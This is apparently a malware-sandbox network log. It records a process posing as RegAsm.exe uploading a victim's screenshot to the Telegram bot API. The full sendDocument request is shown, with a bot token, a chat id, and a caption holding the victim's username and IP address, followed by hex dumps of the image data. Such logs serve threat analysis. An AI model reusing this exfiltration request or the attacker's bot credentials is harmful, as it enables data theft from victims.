01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd34a0b1020d5fContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:07 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:07 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.449879149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:08 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd352dd751ac8b
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695479
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 32 64 64 37 35 31 61 63 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd352dd751ac8bContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
